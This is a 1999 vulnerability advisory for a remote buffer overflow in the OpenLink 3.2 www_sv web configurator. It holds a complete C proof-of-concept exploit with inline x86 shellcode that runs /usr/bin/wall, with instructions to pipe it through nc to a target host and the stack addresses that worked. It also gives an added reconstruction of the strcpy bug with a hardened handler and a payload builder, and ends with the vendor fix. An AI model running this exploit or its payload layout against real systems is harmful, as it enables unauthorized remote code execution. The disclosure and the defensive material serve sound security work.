OpenLink 3.2 remote buffer overflow vulnerability


Published: 1999-10-19
Updated: 1999-10-19
Severity:
Impact: remote administrator privileges
Error type: input validation error
Exploit vector: server side

Affected systems
Misc
OPENLINK3.2
Detailed description
Both the UNIX and NT versions of OpenLink 3.2 are exposed to a remote overflow attack. The problem lies in the web-based configuration tool shipped with OpenLink 3.2 (www_sv): by a design error it copies client-supplied input with strcpy(), which performs no bounds check on the destination buffer. Exploiting the flaw lets a remote attacker use OpenLink to run arbitrary binary code on the target host.

Proof-of-concept code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/*
 * Exploit for Openlink's web configurator for Linux/glibc2
 * use: pipe through netcat to openlink web port (8000 default)
 * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
 * makes www_sv execute /usr/bin/wall if you hit the address right
 *
 * For informational purposes only. This was written to show that
 * there's a problem, not for skr1pt k1dd33z -- don't ask me for help
 * on how to use this to crack systems, help compiling or anything else.
 * It will only compile on an x86 compiler however.
 *
 * Addresses that work for me: 0xbffffb65 (initial run of the broker)
 *                             0xbffffb85 (all consecutive attempts)
 * probably tied to process ID www_sv runs as; first try PIDs were in
 * triple digits, others 4 digit PIDs.
 *
 * If this works, generally no more www_sv processes will be run as a
 * side effect.
 */
void test(void)
{
    __asm__(
        "jmp doit\n\t"
        "exploit:\n\t"
        /* code basically from Aleph One's smash stacking article, with minor mods */
        "popl %esi\n\t"              /* %esi -> the "..usr.bin.wall." string below */
        "movb $0xd0, %al\n\t"        /* get a / character into %al: */
        "xorb $0xff, %al\n\t"        /* 0xd0 ^ 0xff = 0x2f = '/' */
        "movb %al, 0x1(%esi)\n\t"    /* drop /s into place */
        "movb %al, 0x5(%esi)\n\t"
        "movb %al, 0x9(%esi)\n\t"
        "xorl %eax, %eax\n\t"        /* clear %eax */
        "movb %al, 0xe(%esi)\n\t"    /* drop a 0 at end of string (original wrote movb %eax, which old gas accepted as a byte store) */
        "movl %eax, 0x13(%esi)\n\t"  /* drop NULL for environment */
        "leal 0x13(%esi), %edx\n\t"  /* point %edx to environment */
        "movl %esi, 0xf(%esi)\n\t"   /* drop pointer to argv */
        "leal 0xf(%esi), %ecx\n\t"   /* point %ecx to argv */
        "movl %esi, %ebx\n\t"        /* point %ebx to command - 1 */
        "inc %ebx\n\t"               /* fix it to point to the right place */
        "movb $0xb, %al\n\t"         /* index to execve syscall */
        "int $0x80\n\t"              /* execute it */
        "xorl %ebx, %ebx\n\t"        /* if exec failed, exit nicely... */
        "movl %ebx, %eax\n\t"
        "inc %eax\n\t"
        "int $0x80\n"
        "doit:\n\t"
        "call exploit\n\t"           /* pushes the string address, popped into %esi above */
        ".string \"..usr.bin.wall.\"\n"
    );
}

/* skip the 3-byte prologue (pushl %ebp; movl %esp,%ebp) that the 1999-era
 * compiler emitted; a newer compiler may emit a longer prologue */
char *shellcode = ((char *)test) + 3;
char code[1000];

int main(int argc, char *argv[])
{
    int i;
    unsigned char where[5] = {0, 0, 0, 0, 0};  /* 4 address bytes + NUL terminator */
    char *dummy;
    uint32_t addr;

    if (argc > 1)
        addr = (uint32_t)strtoul(argv[1], &dummy, 0);
    else
        addr = 0xbffffb85;
    fprintf(stderr, "Setting address to %8x\n", (unsigned)addr);
    memcpy(where, &addr, 4);          /* little-endian; the working addresses contain no NUL byte */
    strcpy(code, shellcode);          /* copies up to the NUL that ends "..usr.bin.wall." */
    for (i = 0; i < 64; i++)
        strcat(code, (char *)where);  /* repeat the return address to cover the saved EIP slot */
    printf("GET %s\n", code);
    exit(0);
}
--- cut ---
After compiling (on a 32-bit x86 toolchain, e.g. gcc -m32), run ./oplwall 0xbffffb85 | nc machine.to.hit 8000, adjusting the stack address on the command line as needed (0xbffffb65, 0xbffffb85 or 0xbffffbe5).

This program makes the target execute wall, a command that broadcasts a message to all logged-in users.
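The bug class the description names, as an added example that is not OpenLink's code: a hypothetical request handler that copies the request path into a fixed stack buffer with strcpy(), the bounded handler that rejects what does not fit, and a builder that lays out a request the way oplwall does (shellcode followed by 64 copies of the return address) so both handlers can be fed the same input. The buffer size (128 bytes), the function names and the "GET <path>" line format are assumptions; the shellcode is a constructed run of NOP bytes, not the real code from the page.

```c
/* Added example, not OpenLink's code. Reconstructs the strcpy() bug class
 * from the advisory and the request layout oplwall sends. Buffer size,
 * names and the GET-line format are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATH_BUF 128   /* assumed size of the configurator's path buffer */

/* Vulnerable pattern (assumed): no length check before strcpy(). A path
 * longer than PATH_BUF-1 bytes runs past the buffer into the saved EIP. */
int handle_request_unsafe(const char *request_line)
{
    char path[PATH_BUF];
    if (strncmp(request_line, "GET ", 4) != 0)
        return -1;
    strcpy(path, request_line + 4);   /* overflow when the path is too long */
    return (int)strlen(path);
}

/* Hardened version: measure first, refuse anything that does not fit. */
int handle_request_safe(const char *request_line, char *path, size_t pathlen)
{
    if (strncmp(request_line, "GET ", 4) != 0)
        return -1;
    const char *p = request_line + 4;
    size_t n = strcspn(p, " \r\n");   /* path ends at SP, CR or LF */
    if (n == 0 || n >= pathlen)
        return -1;                    /* too long: reject, never truncate silently */
    memcpy(path, p, n);
    path[n] = '\0';
    return (int)n;
}

/* Lay out an oplwall-style request: "GET " + shellcode + copies of addr + "\n".
 * Returns the total length, or -1 if it would not fit or if the shellcode or
 * the address contains a zero byte (strcpy()/strcat() delivery stops there). */
int build_request(const unsigned char *sc, size_t sclen, uint32_t addr,
                  int copies, char *out, size_t outlen)
{
    unsigned char a[4];
    memcpy(a, &addr, 4);              /* host order; x86 is little-endian like the target */
    for (int i = 0; i < 4; i++)
        if (a[i] == 0)
            return -1;
    if (memchr(sc, 0, sclen) != NULL)
        return -1;
    size_t need = 4 + sclen + 4 * (size_t)copies + 2;   /* "GET " ... "\n" NUL */
    if (need > outlen)
        return -1;
    size_t pos = 0;
    memcpy(out + pos, "GET ", 4); pos += 4;
    memcpy(out + pos, sc, sclen); pos += sclen;
    for (int i = 0; i < copies; i++) {
        memcpy(out + pos, a, 4);
        pos += 4;
    }
    out[pos++] = '\n';
    out[pos] = '\0';
    return (int)pos;
}

int main(void)
{
    unsigned char nops[40];           /* constructed stand-in for shellcode */
    memset(nops, 0x90, sizeof nops);
    char req[1024], path[PATH_BUF];

    int len = build_request(nops, sizeof nops, 0xbffffb85u, 64, req, sizeof req);
    printf("payload length %d, path buffer %d bytes\n", len, PATH_BUF);
    printf("bounded handler on payload: %d\n",
           handle_request_safe(req, path, sizeof path));
    printf("bounded handler on normal request: %d\n",
           handle_request_safe("GET /index.html HTTP/1.0\r\n", path, sizeof path));
    return 0;
}
```

The builder refuses an address containing a 0x00 byte for the same reason oplwall builds its line with strcat(): every hop, the client-side strcat() and the server-side strcpy(), stops at the first NUL, so a return address with a zero byte never reaches the saved return slot intact. The bounded handler rejects rather than truncates, because silently cutting a path to PATH_BUF-1 bytes turns an overflow into a different bug, a path that no longer names what the client asked for.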

Solution
Disable the www_sv application in oplaqb.ini; by default this service is marked as persistent. Prefix the line Configurator = www_sv under [Persistent Services] and every line under [www_sv] with a semicolon:

;[Persistent Services]
;Configurator = www_sv
;[www_sv]
;Program = w3config/www_sv
;Directory = w3config
;CommandLine =
;Environment = WWW_SV
;[Environment WWW_SV]